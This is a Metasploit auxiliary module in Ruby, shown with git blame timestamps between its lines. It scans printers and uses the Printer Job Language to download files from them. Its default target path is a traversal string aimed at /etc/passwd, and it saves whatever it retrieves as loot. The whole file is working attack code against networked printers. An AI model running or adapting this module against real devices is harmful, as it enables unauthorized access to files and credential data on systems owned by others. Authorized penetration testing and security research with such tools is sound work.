metasploit-framework/modules/auxiliary/scanner/printer/printer_download_file.rb

68 lines
1.6 KiB
Ruby
Raw Normal View History

2013-12-05 03:46:45 +00:00
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "msf/core"
require "rex/proto/pjl"
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
2013-12-05 16:25:04 +00:00
include Msf::Auxiliary::Scanner
2014-01-15 19:49:37 +00:00
include Msf::Auxiliary::Report
2013-12-05 03:46:45 +00:00
def initialize(info = {})
super(update_info(info,
2014-01-15 19:49:37 +00:00
"Name" => "Printer File Download Scanner",
"Description" => %q{
This module downloads a file from a set of printers using the
Printer Job Language (PJL) protocol.
2013-12-05 03:46:45 +00:00
},
2014-01-15 19:49:37 +00:00
"Author" => [
"wvu", # Rex::Proto::PJL and modules
2014-01-15 19:49:37 +00:00
"sinn3r", # RSpec tests
"MC", # Independent mixin and modules
"Myo Soe", # Independent modules
2014-01-27 14:40:44 +00:00
"Matteo Cantoni <goony[at]nothink.org>" # Independent modules
2013-12-05 06:28:53 +00:00
],
2014-01-15 19:49:37 +00:00
"References" => [
2013-12-05 03:46:45 +00:00
["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"]
],
2014-01-15 19:49:37 +00:00
"License" => MSF_LICENSE
2013-12-05 03:46:45 +00:00
))
register_options([
2014-01-15 19:49:37 +00:00
Opt::RPORT(Rex::Proto::PJL::DEFAULT_PORT),
OptString.new("PATHNAME", [true, "Pathname", '0:\..\..\..\etc\passwd'])
2013-12-05 03:46:45 +00:00
], self.class)
end
def run_host(ip)
2014-01-15 19:49:37 +00:00
pathname = datastore["PATHNAME"]
2013-12-05 03:46:45 +00:00
connect
pjl = Rex::Proto::PJL::Client.new(sock)
pjl.begin_job
2014-01-15 19:49:37 +00:00
pjl.fsinit(pathname[0..1])
file = pjl.fsupload(pathname)
2014-01-15 19:49:37 +00:00
pjl.end_job
2013-12-05 03:46:45 +00:00
disconnect
if file
res = store_loot(
"printer.file",
"application/octet-stream",
ip,
file,
pathname,
"Printer file"
)
print_good("#{ip}:#{rport} - Saved #{pathname} as #{res}")
2013-12-05 03:46:45 +00:00
end
end
end